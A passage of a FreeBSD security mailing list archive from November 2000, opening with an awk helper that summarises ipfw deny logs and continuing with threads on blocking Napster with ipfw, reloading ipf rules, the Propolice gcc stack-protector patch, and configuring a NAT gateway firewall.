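Nov 17 18:31:00 gw /kernel: ipfw: 100 Accept TCP 192.168.1.10:1031 10.0.0.1:22 out via ed0
Nov 17 18:31:07 gw sshd[221]: Accepted publickey for user from 192.168.1.10
Nov 17 18:31:13 gw /kernel: ipfw: 600 Deny TCP 192.168.1.10:1032 208.178.163.58:8888 out via tun0
EOF
}

# summarize_ipfw_denies LOGFILE
#   Prints one line per (rule, source host) for Deny entries, most hits
#   first; ties are broken by rule number, then address, so the output
#   is stable enough to diff between runs.
summarize_ipfw_denies() {
    awk '
        /ipfw: [0-9]+ Deny / {
            # locate the "ipfw:" token so the syslog prefix may vary in width
            for (i = 1; i <= NF && $i != "ipfw:"; i++) ;
            if (i > NF) next
            rule = $(i + 1)
            src  = $(i + 4)
            sub(/:[0-9]+$/, "", src)     # drop the ephemeral source port
            hits[rule " " src]++
        }
        END { for (k in hits) print hits[k], k }
    ' "$1" \
    | sort -k1,1nr -k2,2n -k3,3 \
    | awk '{ printf "rule=%s src=%s hits=%s\n", $2, $3, $1 }'
}

# Usage against a real gateway: summarize_ipfw_denies /var/log/security
```

For rule 660 the "source" is the remote side (the rule keys on source port 8888 of inbound traffic), so the summary naturally separates inside hosts initiating connections from outside hosts answering them.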
From: Dragos Ruiu
To: Nate Williams, Buliwyf McGraw
Cc: security@FreeBSD.ORG
Subject: Re: Napster Port
Date: Fri, 17 Nov 2000 17:24:06 -0800

Napster protocol description:

url: http://opennap.sourceforge.net/napster.txt

cheers,
--dr

On Fri, 17 Nov 2000, Nate Williams wrote:
> > Hi to everyone!
> > This is my question:
> > - I want to deny all access to Napster from my subnet. I'm using ip
> > filter... but I don't know what is the port that I need to block...
> > Any suggestion about the right rule in my gateway???
>
> This is the best I've got so far...
>
> # Disable Napster
> /sbin/ipfw add 600 deny log tcp from any to 208.178.163.56/29 via ${netif}
> /sbin/ipfw add 610 deny log tcp from any to 208.178.175.128/29 via ${netif}
> /sbin/ipfw add 620 deny log tcp from any to 208.49.239.240/28 via ${netif}
> /sbin/ipfw add 630 deny log tcp from any to 208.49.228.0/24 via ${netif}
> /sbin/ipfw add 640 deny log tcp from any to 208.184.216.0/24 via ${netif}
> /sbin/ipfw add 650 deny log tcp from any to 64.124.41.0/24 via ${netif}
> /sbin/ipfw add 660 deny log tcp from any 8888 to any via ${netif}
>
> {where 'netif' is the network interface for the internet}

From owner-freebsd-security Fri Nov 17 18:08:41 2000
From: "David O'Brien"
To: KOJIMA Hajime
Cc: security@FreeBSD.ORG
Subject: Re: FYI: Propolice for gcc-2.95.2
Date: Fri, 17 Nov 2000 18:08:32 -0800

On Thu, Nov 16, 2000 at 11:52:38AM +0900, KOJIMA Hajime wrote:
> FYI: "Propolice", GCC extension for protecting applications from
> stack-smashing attacks, for gcc-2.95.2 is now available.
>

I'll look at adding this to the bc-gcc port.

From owner-freebsd-security Fri Nov 17 18:11:12 2000
From: "David O'Brien"
To: Warner Losh
Cc: Kris Kennaway, security@FreeBSD.ORG
Subject: Re: FYI: Propolice for gcc-2.95.2
Date: Fri, 17 Nov 2000 18:11:07 -0800

On Thu, Nov 16, 2000 at 06:08:35PM -0700, Warner Losh wrote:
> My concern would be if we put this into the 2.95.2 tree that we have.

It won't go in. Period.

> I'd have no problems with making this "easy" to enable.

Don't forget that our world cannot be compiled by a stock FSF GCC.

--
-- David  (obrien@FreeBSD.org)
GNU is Not Unix / Linux Is Not UniX

From owner-freebsd-security Fri Nov 17 18:13:27 2000
From: "David O'Brien"
To: Trevor Johnson
Cc: security@FreeBSD.ORG
Subject: Re: FYI: Propolice for gcc-2.95.2
Date: Fri, 17 Nov 2000 18:13:22 -0800

On Thu, Nov 16, 2000 at 08:54:47PM -0500, Trevor Johnson wrote:
> > FYI: "Propolice", GCC extension for protecting applications from
> > stack-smashing attacks, for gcc-2.95.2 is now available.
> >
>
> At ftp://dse.doc.ic.ac.uk/pub/misc/bcc/ there is another set of patches
> that add bounds-checking to GCC, but unfortunately the newest is for GCC
> 2.7.2.

You're speaking of the ports/lang/bc-gcc port w/o realizing it.

--
-- David  (obrien@FreeBSD.org)
GNU is Not Unix / Linux Is Not UniX

From owner-freebsd-security Fri Nov 17 18:19:35 2000
From: Pedro Almeida
To: Nuno Teixeira
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Restarting Firewall ruleset
Date: Sat, 18 Nov 2000 02:19:39 +0000 (GMT)

Assuming that you are using ipf:

ipf -F a -> "Stops" the firewall (it really flushes the rule set!)

ipf -f /path-to-whateve.conf -> loads the new rule set.

Pedro

On Fri, 17 Nov 2000, Nuno Teixeira wrote:

> Hello to all,
>
> Finally I configured a ppp firewall for my FreeBSD gateway. It is working
> without any problems.
>
> My question is: how to restart the firewall. I'm asking this, because I want to
> make a lot of tests with it (opening / closing services, etc) and I don't
> know how to restart it without rebooting the gateway machine.
>
> Thanks very much,
>
> Nuno Teixeira

From owner-freebsd-security Fri Nov 17 18:52:11 2000
From: Trevor Johnson
To: "David O'Brien"
Cc: security@FreeBSD.ORG
Subject: Re: FYI: Propolice for gcc-2.95.2
Date: Fri, 17 Nov 2000 21:52:08 -0500 (EST)

> > At ftp://dse.doc.ic.ac.uk/pub/misc/bcc/ there is another set of patches
> > that add bounds-checking to GCC, but unfortunately the newest is for GCC
> > 2.7.2.
>
> You're speaking of the ports/lang/bc-gcc port w/o realizing it.

Do you plan to update the port to use Herman ten Brugge's patches
(http://web.inter.nl.net/hcc/Haj.Ten.Brugge/), as mentioned by Jeremy Nelson?
--
Trevor Johnson
http://jpj.net/~trevor/gpgkey.txt

From owner-freebsd-security Fri Nov 17 18:55:28 2000
From: "Nuno Teixeira"
To: "Pedro Almeida"
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Restarting Firewall ruleset
Date: Sat, 18 Nov 2000 02:58:15 -0000

Hello Pedro,

Thanks for the tip. [University of Coimbra?]

---------------------

Hi, Pedro,

Thanks. It worked ok.

[www.uc.pt]

Bye,

Nuno Teixeira

----- Original Message -----
From: "Pedro Almeida"
To: "Nuno Teixeira"
Cc: freebsd-security@FreeBSD.ORG
Sent: Saturday, November 18, 2000 2:19 AM
Subject: Re: Restarting Firewall ruleset

> Assuming that you are using ipf:
>
> ipf -F a -> "Stops" the firewall (it really flushes the rule set!)
>
> ipf -f /path-to-whateve.conf -> loads the new rule set.
>
> Pedro
>
> On Fri, 17 Nov 2000, Nuno Teixeira wrote:
>
> > Hello to all,
> >
> > Finally I configured a ppp firewall for my FreeBSD gateway. It is working
> > without any problems.
> >
> > My question is: how to restart the firewall. I'm asking this, because I want to
> > make a lot of tests with it (opening / closing services, etc) and I don't
> > know how to restart it without rebooting the gateway machine.
> >
> > Thanks very much,
> >
> > Nuno Teixeira

From owner-freebsd-security Fri Nov 17 19:34:40 2000
From: "Jonathan M. Slivko" To: "Nate Williams" , "Buliwyf McGraw" Cc: References: <14869.55781.674921.949509@nomad.yogotech.com> Subject: Re: Napster Port Date: Fri, 17 Nov 2000 21:30:39 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2919.6700 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Napster, the server runs on port 6699. -- Jonathan M. Slivko ----- Original Message ----- 
From: "Nate Williams"
To: "Buliwyf McGraw"
Cc:
Sent: Friday, November 17, 2000 8:22 PM
Subject: Re: Napster Port

> > Hi to everyone!
> > This is my question:
> > - I want to deny all access to Napster from my subnet. I'm using ip
> > filter... but I don't know what is the port that I need to block...
> > Any suggestion about the right rule in my gateway???
>
> This is the best I've got so far...
>
> # Disable Napster
> /sbin/ipfw add 600 deny log tcp from any to 208.178.163.56/29 via ${netif}
> /sbin/ipfw add 610 deny log tcp from any to 208.178.175.128/29 via ${netif}
> /sbin/ipfw add 620 deny log tcp from any to 208.49.239.240/28 via ${netif}
> /sbin/ipfw add 630 deny log tcp from any to 208.49.228.0/24 via ${netif}
> /sbin/ipfw add 640 deny log tcp from any to 208.184.216.0/24 via ${netif}
> /sbin/ipfw add 650 deny log tcp from any to 64.124.41.0/24 via ${netif}
> /sbin/ipfw add 660 deny log tcp from any 8888 to any via ${netif}
>
> {where 'netif' is the network interface for the internet}
>
>
>
> Nate
>
>

From owner-freebsd-security Fri Nov 17 20: 0:14 2000
Delivered-To: freebsd-security@freebsd.org
Received: from smtp2.cluster.oleane.net (smtp2.cluster.oleane.net [195.25.12.17]) by hub.freebsd.org (Postfix) with ESMTP id 2C8FC37B479 for ; Fri, 17 Nov 2000 20:00:10 -0800 (PST)
Received: from diabolic-cow.321.net (dyn-1-1-005.Orl.dialup.oleane.fr [195.25.26.5]) by smtp2.cluster.oleane.net with ESMTP id eAI406C38242 for ; Sat, 18 Nov 2000 05:00:07 +0100 (CET)
Received: by diabolic-cow.321.net (Postfix, from userid 1000) id 893CB82; Sat, 18 Nov 2000 00:11:06 +0100 (CET)
Date: Sat, 18 Nov 2000 00:11:06 +0100
From: Rémi Guyomarch
To: freebsd-security@FreeBSD.ORG
Subject: Re: PPP NAT Gateway security
Message-ID: <20001118001106.B21621@diabolic-cow.321.net>
References: <00c801c04dc4$12a89220$0200a8c0@n2> <20001114144513.A888@grok> <001c01c04e97$c69c3c90$0200a8c0@n2> <20001114211934.B888@grok>
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
User-Agent: Mutt/1.2.5i
In-Reply-To: <20001114211934.B888@grok>; from sreid@sea-to-sky.net on Tue, Nov 14, 2000 at 09:19:34PM -0800
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Tue, Nov 14, 2000 at 09:19:34PM -0800, Steve Reid wrote:
...
> This is what I've whipped up for my ipfilter config:
>
> http://sea-to-sky.net/~sreid/ipfinit
> A simple little sh script that takes an interface name (fxp0 in my
> case, tun0 in yours) as an argument and extracts the IP address
> information from ifconfig, then performs the appropriate substitutions
> on ipf.cfg and feeds the results to ipf.

OpenBSD did the same thing but integrated it in the ipfilter source.
Look at src/sbin/ipf/parse.c (search for 'if_addr') and
src/sbin/ipf/ifaddr.[ch] in the obsd CVS tree.

-- 
Rémi

From owner-freebsd-security Fri Nov 17 20:44:47 2000
Delivered-To: freebsd-security@freebsd.org
Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id 7CC0237B4C5; Fri, 17 Nov 2000 20:44:45 -0800 (PST)
Received: (from kris@localhost) by citusc17.usc.edu (8.11.1/8.11.1) id eAI4jtV49949; Fri, 17 Nov 2000 20:45:56 -0800 (PST) (envelope-from kris)
Date: Fri, 17 Nov 2000 20:45:52 -0800
From: Kris Kennaway
To: "David O'Brien"
Cc: Warner Losh , Kris Kennaway , security@FreeBSD.ORG
Subject: Re: FYI: Propolice for gcc-2.95.2
Message-ID: <20001117204551.A45655@citusc17.usc.edu>
References: <20001116170042.A58481@citusc17.usc.edu> <200011162332.QAA69958@harmony.village.org> <20001116170042.A58481@citusc17.usc.edu> <200011170108.SAA70664@harmony.village.org> <20001117181107.B33370@dragon.nuxi.com>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="y0ulUmNC+osPPQO6"
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20001117181107.B33370@dragon.nuxi.com>; from obrien@FreeBSD.ORG on Fri, Nov 17, 2000 at 06:11:07PM -0800
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, Nov 17, 2000 at 06:11:07PM -0800, David O'Brien wrote:
> > I'd have no problems with making this "easy" to enable.
>
> Don't forget that our world cannot be compiled by a stock FSF GCC.

It patches cleanly against the version in our tree - see the patches I
posted earlier. The only problem I've seen so far is that /bin/echo won't
compile with -fstack-protector because of an unresolved open() symbol in
the smashed stack handler (presumably /bin/echo doesn't call open()). I
left a make world -k running at home, I'll check it tonight to see what
else didn't compile.

Kris

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org

iEUEARECAAYFAjoWCX8ACgkQWry0BWjoQKU0UACWJD8C44Uau4Fq+F+KodCtrEIc
sgCg/cKmWHcbEpato+a1lf2AMMatE48=
=sLn4
-----END PGP SIGNATURE-----

From owner-freebsd-security Fri Nov 17 22:45:24 2000
Delivered-To: freebsd-security@freebsd.org
Received: from silby.com (cb34181-c.mdsn1.wi.home.com [24.183.3.139]) by hub.freebsd.org (Postfix) with ESMTP id 2695537B4CF for ; Fri, 17 Nov 2000 22:45:22 -0800 (PST)
Received: (qmail 45459 invoked by uid 1000); 18 Nov 2000 06:45:20 -0000
Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 18 Nov 2000 06:45:20 -0000
Date: Sat, 18 Nov 2000 00:45:20 -0600 (CST)
From: Mike Silbersack
To: David O'Brien
Cc: Warner Losh , Kris Kennaway , security@FreeBSD.ORG
Subject: Re: FYI: Propolice for gcc-2.95.2
In-Reply-To: <20001117181107.B33370@dragon.nuxi.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, 17 Nov 2000, David O'Brien wrote:

> On Thu, Nov 16, 2000 at 06:08:35PM -0700, Warner Losh wrote:
> > My concern would be if we put this into the 2.95.2 tree that we have.
>
> It won't go in. Period.

Perhaps if it works well, the patch can be put into contrib, and there can
be a single switch to throw that will cause the patch to be applied during
buildworld, resulting in everything being compiled with the stack
protection as well. (Assuming the world is compiled with the just-compiled
compiler, I'm not too familiar with the innards of the build process.)

Mike "Silby" Silbersack

From owner-freebsd-security Sat Nov 18 8:19:47 2000
Delivered-To: freebsd-security@freebsd.org
Received: from joe.halenet.com.au (joe.halenet.com.au [203.37.141.114]) by hub.freebsd.org (Postfix) with ESMTP id 4E35B37B4C5; Sat, 18 Nov 2000 08:19:40 -0800 (PST)
Received: from temp19 (modem-112-st.halenet.com.au [203.55.33.112]) by joe.halenet.com.au (8.9.1/8.9.1) with SMTP id BAA03268; Sun, 19 Nov 2000 01:16:10 +1000 (EST) (envelope-from timbo@halenet.com.au)
Message-ID: <04b101c0517b$c068e120$6500a8c0@halenet.com.au>
From: "Tim McCullagh"
To: ,
Subject: De installing DES
Date: Sun, 19 Nov 2000 02:22:28 +1000
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2919.6600
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6600
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hi

Can anyone tell me how I would go about deinstalling DES. I am trying to
use md5 and I have changed the links under /usr/lib/libcrypt* etc and I
have added passwd_format=md5 to the login.conf to no avail.

Any suggestions would be appreciated

TIA

regards

Tim

From owner-freebsd-security Sat Nov 18 10: 4:57 2000
Delivered-To: freebsd-security@freebsd.org
Received: from ipass.one.net (news2.one.net [206.112.192.118]) by hub.freebsd.org (Postfix) with ESMTP id 0EE9237B4C5 for ; Sat, 18 Nov 2000 10:04:49 -0800 (PST)
Received: from bigfoot.com (cvg-27-180-111.cinci.rr.com [24.27.180.111]) by ipass.one.net (8.8.7/8.8.7) with ESMTP id NAA22898 for ; Sat, 18 Nov 2000 13:08:18 -0500
Message-ID: <3A16C44B.4DEC2492@bigfoot.com>
Date: Sat, 18 Nov 2000 13:02:51 -0500
From: Sam Carleton
X-Mailer: Mozilla 4.75 [en] (Windows NT 5.0; U)
X-Accept-Language: en
MIME-Version: 1.0
To: security@freebsd.org
Subject: help setting up a firewall
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I have read through the “Setting-up a Dual-Homed Host using IPFW and
NATD”, but the script is not working for me. My setup is a bit
different. My connectivity is via a cable modem.

* In the article, it looks like the author was setup with a static
external IP address. I have a dynamic ip address. How do I allow the
DHCP server (Cable Modem) broadcasts to get to my outside NIC?

* In the article, the author is only allowing the inside connections to
connect to known DNS servers. I run a caching DNS server on the inside
so I need to have the firewall configured so that the internal DNS
server can talk to any other DNS server.

* In the article, it looks like the author is allowing things like HTTP
and SSH to come into the firewall machine. I want those things to be
passed onto another internal machine.

Attached you will find my modifications to the rc.firewall script and
relevant snips of rc.conf. If you have any thoughts on what I am doing
wrong, please drop me an email. Thanks!

------------rc.conf------------
firewall_enable="Yes"
firewall_type="Simple"
firewall_script="/etc/rc.firewall"
firewall_quite="No"
natd_program="/sbin/natd"
natd_enable="Yes"
natd_interface="ep0"
natd_flags="-f /etc/natd.conf"

------------rc.firewall------------
############
# Setup system for firewall service.
# $FreeBSD: src/etc/rc.firewall,v 1.30.2.4 2000/05/28 19:17:15 asmodai Exp $

# Suck in the configuration variables.
if [ -r /etc/defaults/rc.conf ]; then
	. /etc/defaults/rc.conf
	source_rc_confs
elif [ -r /etc/rc.conf ]; then
	. /etc/rc.conf
fi

############
# Define the firewall type in /etc/rc.conf.  Valid values are:
#   open     - will allow anyone in
#   client   - will try to protect just this machine
#   simple   - will try to protect a whole network
#   closed   - totally disables IP services except via lo0 interface
#   UNKNOWN  - disables the loading of firewall rules.
#   filename - will load the rules in the given filename (full path required)
#
# For ``client'' and ``simple'' the entries below should be customized
# appropriately.

############
#
# If you don't know enough about packet filtering, we suggest that you
# take time to read this book:
#
#	Building Internet Firewalls
#	Brent Chapman and Elizabeth Zwicky
#
#	O'Reilly & Associates, Inc
#	ISBN 1-56592-124-0
#	http://www.ora.com/
#
#  For a more advanced treatment of Internet Security read:
#
#	Firewalls & Internet Security
#	Repelling the wily hacker
#	William R. Cheswick, Steven M. Bellovin
#
#	Addison-Wesley
#	ISBN 0-201-6337-4
#	http://www.awl.com/
#

if [ -n "${1}" ]; then
	firewall_type="${1}"
fi

############
# Set quiet mode if requested
#
case ${firewall_quiet} in
[Yy][Ee][Ss])
	fwcmd="/sbin/ipfw -q"
	;;
*)
	fwcmd="/sbin/ipfw"
	;;
esac

############
# Flush out the list before we begin.
#
${fwcmd} -f flush

############
# These rules are required for using natd.  All packets are passed to
# natd before they encounter your remaining rules.  The firewall rules
# will then be run again on each packet after translation by natd,
# minus any divert rules (see natd(8)).
#
case ${natd_enable} in
[Yy][Ee][Ss])
	if [ -n "${natd_interface}" ]; then
		${fwcmd} add 50 divert natd all from any to any via ${natd_interface}
	fi
	;;
esac

############
# If you just configured ipfw in the kernel as a tool to solve network
# problems or you just want to disallow some particular kinds of traffic
# then you will want to change the default policy to open.  You can also
# do this as your only action by setting the firewall_type to ``open''.
#
# ${fwcmd} add 65000 pass all from any to any

############
# Only in rare cases do you want to change these rules
#
${fwcmd} add 100 pass all from any to any via lo0
${fwcmd} add 200 deny all from any to 127.0.0.0/8

# If you're using 'options BRIDGE', uncomment the following line to pass ARP
#${fwcmd} add 300 pass udp from 0.0.0.0 2054 to 0.0.0.0

# Prototype setups.
#
case ${firewall_type} in
[Oo][Pp][Ee][Nn])
	${fwcmd} add 65000 pass all from any to any
	;;
[Cc][Ll][Ii][Ee][Nn][Tt])
	############
	# This is a prototype setup that will protect your system somewhat
	# against people from outside your own network.
	############

	# set these to your network and netmask and ip
	net="192.0.2.0"
	mask="255.255.255.0"
	ip="192.0.2.1"

	# Allow any traffic to or from my own net.
	${fwcmd} add pass all from ${ip} to ${net}:${mask}
	${fwcmd} add pass all from ${net}:${mask} to ${ip}

	# Allow TCP through if setup succeeded
	${fwcmd} add pass tcp from any to any established

	# Allow IP fragments to pass through
	${fwcmd} add pass all from any to any frag

	# Allow setup of incoming email
	${fwcmd} add pass tcp from any to ${ip} 25 setup

	# Allow setup of outgoing TCP connections only
	${fwcmd} add pass tcp from ${ip} to any setup

	# Disallow setup of all other TCP connections
	${fwcmd} add deny tcp from any to any setup

	# Allow DNS queries out in the world
	${fwcmd} add pass udp from any 53 to ${ip}
	${fwcmd} add pass udp from ${ip} to any 53

	# Allow NTP queries out in the world
	${fwcmd} add pass udp from any 123 to ${ip}
	${fwcmd} add pass udp from ${ip} to any 123

	# Everything else is denied by default, unless the
	# IPFIREWALL_DEFAULT_TO_ACCEPT option is set in your kernel
	# config file.
	;;
[Ss][Ii][Mm][Pp][Ll][Ee])
	############
	# This is a prototype setup for a simple firewall.  Configure this
	# machine as a named server and ntp server, and point all the machines
	# on the inside at this machine for those services.
	############

	# set these to your outside interface network and netmask and ip
	oif="ep0"
	# onet="192.0.2.0"
	# omask="255.255.255.240"
	# oip="192.0.2.1"

	# set these to your inside interface network and netmask and ip
	iif="xl1"
	inet="192.168.0.0"
	imask="255.255.255.0"
	iip="192.168.0.6"

	# Stop spoofing
	${fwcmd} add deny all from ${inet}:${imask} to any in via ${oif}
	# ${fwcmd} add deny all from ${onet}:${omask} to any in via ${iif}

	# Stop RFC1918 nets on the outside interface
	${fwcmd} add deny all from 10.0.0.0/8 to any via ${oif}
	${fwcmd} add deny all from any to 10.0.0.0/8 out via ${oif}
	${fwcmd} add deny all from 172.16.0.0/12 to any via ${oif}
	${fwcmd} add deny all from any to 172.16.0.0/12 out via ${oif}
	${fwcmd} add deny all from 192.168.0.0/16 to any via ${oif}
	${fwcmd} add deny all from any to 192.168.0.0/16 out via ${oif}

	# Stop draft-manning-dsua-01.txt nets on the outside interface
	${fwcmd} add deny all from 0.0.0.0/8 to any via ${oif}
	${fwcmd} add deny all from any to 0.0.0.0/8 via ${oif}
	${fwcmd} add deny all from 169.254.0.0/16 to any via ${oif}
	${fwcmd} add deny all from any to 169.254.0.0/16 via ${oif}
	${fwcmd} add deny all from 192.0.2.0/24 to any via ${oif}
	${fwcmd} add deny all from any to 192.0.2.0/24 via ${oif}
	${fwcmd} add deny all from 224.0.0.0/4 to any via ${oif}
	${fwcmd} add deny all from any to 224.0.0.0/4 via ${oif}
	${fwcmd} add deny all from 240.0.0.0/4 to any via ${oif}
	${fwcmd} add deny all from any to 240.0.0.0/4 via ${oif}

	# Allow TCP through if setup succeeded
	${fwcmd} add pass tcp from any to any established

	# Allow IP fragments to pass through
	${fwcmd} add pass all from any to any frag

	# HTTP - Allow access to our web server
	${fwcmd} add pass tcp from any to any 80 setup

	# SMTP - Allow access to sendmail for incoming e-mail
	${fwcmd} add pass tcp from any to any 25 setup

	# FTP - Allow incoming data channel for outgoing connections,
	# Reject&Log all incoming control connections
	${fwcmd} add pass tcp from any 20 to any 1024-65535 setup
	${fwcmd} add deny tcp log tcp from any to any 21 in via ${oif} setup

	# SSH Login - Allow & Log all incoming
	${fwcmd} add pass log tcp from any to any 22 in via ${oif} setup

	# IDENT - Reset incoming connections
	${fwcmd} add reset tcp from any to any 113 in via ${oif} setup

	# Reject&Log all setup of incoming connections from the outside
	${fwcmd} add deny log tcp from any to any in via ${oif} setup

	# Allow setup of any other TCP connection
	${fwcmd} add pass tcp from any to any setup

	# Allow access to our DNS
	# ${fwcmd} add pass tcp from any to ${oif} 53 setup
	# ${fwcmd} add pass udp from any to ${oif} 53
	# ${fwcmd} add pass udp from ${oif} 53 to any

	# Allow DNS queries out in the world
	${fwcmd} add pass udp from any 53 to ${oif}
	${fwcmd} add pass udp from ${oif} to any 53

	# Allow NTP queries out in the world
	${fwcmd} add pass udp from any 123 to any 123 via ${oif}
	${fwcmd} add pass udp from any 123 to any via ${iif}
	${fwcmd} add pass udp from any to any 123 via ${iif}

	# TRACEROUTE - Allow outgoing, but not incoming
	${fwcmd} add pass udp from any to any 33434-33523 out via ${oif}

	### ICMP RULES

	# ICMP packets
	# Allow all ICMP packets on internal interface
	${fwcmd} add pass icmp from any to any via ${iif}

	# Allow outgoing pings, but not incoming
	${fwcmd} add pass icmp from any to any icmptypes 8 out via ${oif}
	${fwcmd} add pass icmp from any to any icmptypes 0 in via ${oif}

	# Allow Destination Unreachable, Source Quench, Time Exceeded, and Bad Head
	${fwcmd} add pass icmp from any to any icmptypes 3,4,11,12 via ${oif}

	# Deny the rest of them
	${fwcmd} add deny icmp from any to any

	# Everything else is denied by default, unless the
	# IPFIREWALL_DEFAULT_TO_ACCEPT option is set in your kernel
	# config file.
	;;
[Uu][Nn][Kk][Nn][Oo][Ww][Nn])
	;;
*)
	if [ -r "${firewall_type}" ]; then
		${fwcmd} ${firewall_flags} ${firewall_type}
	fi
	;;
esac

From owner-freebsd-security Sat Nov 18 15:55: 3 2000
Delivered-To: freebsd-security@freebsd.org
Received: from mailhost01.reflexnet.net (mailhost01.reflexnet.net [64.6.192.82]) by hub.freebsd.org (Postfix) with ESMTP id 7BA1737B479 for ; Sat, 18 Nov 2000 15:54:55 -0800 (PST)
Received: from 149.211.6.64.reflexcom.com ([64.6.211.149]) by mailhost01.reflexnet.net with Microsoft SMTPSVC(5.5.1877.197.19); Sat, 18 Nov 2000 15:53:21 -0800
Received: (from cjc@localhost) by 149.211.6.64.reflexcom.com (8.11.0/8.11.0) id eAINsmU37787; Sat, 18 Nov 2000 15:54:48 -0800 (PST) (envelope-from cjc)
Date: Sat, 18 Nov 2000 15:54:47 -0800
From: "Crist J . Clark"
To: Sam Carleton
Cc: security@FreeBSD.ORG
Subject: Re: help setting up a firewall
Message-ID: <20001118155447.K9740@149.211.6.64.reflexcom.com>
Reply-To: cjclark@alum.mit.edu
References: <3A16C44B.4DEC2492@bigfoot.com>
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="SLDf9lqlvOQaIe6s"
Content-Transfer-Encoding: 8bit
X-Mailer: Mutt 1.0i
In-Reply-To: <3A16C44B.4DEC2492@bigfoot.com>; from scarleton@bigfoot.com on Sat, Nov 18, 2000 at 01:02:51PM -0500
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

[Maybe it's just me, but I think that generic "how do I set up a
firewall?" questions are better suited for -questions. If you have
specific ipfw questions, there is the -ipfw list too. But I can
understand why people ask here.]

On Sat, Nov 18, 2000 at 01:02:51PM -0500, Sam Carleton wrote:
> I have read through the “Setting-up a Dual-Homed Host using IPFW and
> NATD”, but the script is not working for me. My setup is a bit
> different. My connectivity is via a cable modem.
>
> * In the article, it looks like the author was setup with a static
> external IP address. I have a dynamic ip address. How do I allow the
> DHCP server (Cable Modem) broadcasts to get to my outside NIC?

Here's what I do,

	############
	# Info about local net numbers
	dhcpc_fxp0="64.6.192.0/19"
	dhcps_fxp0="${dhcpc_fxp0}"
	net="192.0.2.0/24"
	iip="192.0.2.254"
	ibc="192.0.2.255"
	iif="de0"
	oif=${natd_interface}
	# This is a little more efficient, only one ifconfig(8) call
	set -- `/sbin/ifconfig ${natd_interface} | /usr/bin/fgrep -w inet`
	oip="$2"
	obc="$6"

[snip]

	############
	# Let external DHCP work
	for dhclient_interface in ${network_interfaces}; do
		eval ifconfig_args=\$ifconfig_${dhclient_interface}
		case ${ifconfig_args} in
		[Dd][Hh][Cc][Pp])
			eval dhcpc_range=\$dhcpc_$dhclient_interface
			eval dhcps_range=\$dhcps_$dhclient_interface
			$fwcmd add pass udp from ${dhcpc_range} 68 to ${dhcps_range} 67 out via ${dhclient_interface}
			$fwcmd add pass udp from ${dhcps_range} 67 to ${dhcpc_range} 68 in via ${dhclient_interface}
			$fwcmd add pass udp from 0.0.0.0 68 to 255.255.255.255 67 out via ${dhclient_interface}
			$fwcmd add pass udp from ${dhcps_range} 67 to 255.255.255.255 68 in via ${dhclient_interface}
			;;
		esac
	done

> * In the article, the author is only allowing the inside connections to
> connect to known DNS servers. I run a caching DNS server on the inside
> so I need to have the firewall configured so that the internal DNS
> server can talk to any other DNS server.

These two are only safe to do after you've stopped spoofing and other
stuff like that,

	$fwcmd add pass udp from ${dns_server} to any 53 keep-state
	$fwcmd add pass tcp from ${dns_server} to any 53 keep-state

> * In the article, it looks like the author is allowing things like HTTP
> and SSH to come into the firewall machine. I want those things to be
> passed onto another internal machine.

The rules may or may not change depending on where they are relative to
the divert(4) rule. Also, see 'redirect_address' and 'redirect_port' in
natd(8). You did not post your natd.conf, so I can't tell if you are
already using those.

> Attached you will find my modifications to the rc.firewall script and
> relevant snips of rc.conf. If you have any thoughts on what I am doing
> wrong, please drop me an email. Thanks!

A few nitpicks about your ruleset, but nothing absolutely leaped out at
me as a problem that would totally break everything. Since you did not
tell us exactly what kind of problem you are having, it's hard to know
what to look for.

I attached a little script I use to help debug my rulesets. It's really
simple; it just cuts down on the verbosity of 'ipfw show' a bit. With
some minor mods, it can also really nicely work on the rc.firewall
script (although it does even help as-is).

> ------------rc.conf------------
> firewall_enable="Yes"
> firewall_type="Simple"
> firewall_script="/etc/rc.firewall"
> firewall_quite="No"
> natd_program="/sbin/natd"
> natd_enable="Yes"
> natd_interface="ep0"
> natd_flags="-f /etc/natd.conf"

When posting questions of this sort, entries relevant to interface
setup should be included as well.

> ------------rc.firewall------------
> ############
> # Setup system for firewall service.
> # $FreeBSD: src/etc/rc.firewall,v 1.30.2.4 2000/05/28 19:17:15 asmodai
> Exp $

This is a fairly old version of rc.firewall.

[snip]

> [Ss][Ii][Mm][Pp][Ll][Ee])
> ############
> # This is a prototype setup for a simple firewall. Configure this
> # machine as a named server and ntp server, and point all the machines
> # on the inside at this machine for those services.
> ############
>
> # set these to your outside interface network and netmask and ip
> oif="ep0"
> # onet="192.0.2.0"
> # omask="255.255.255.240"
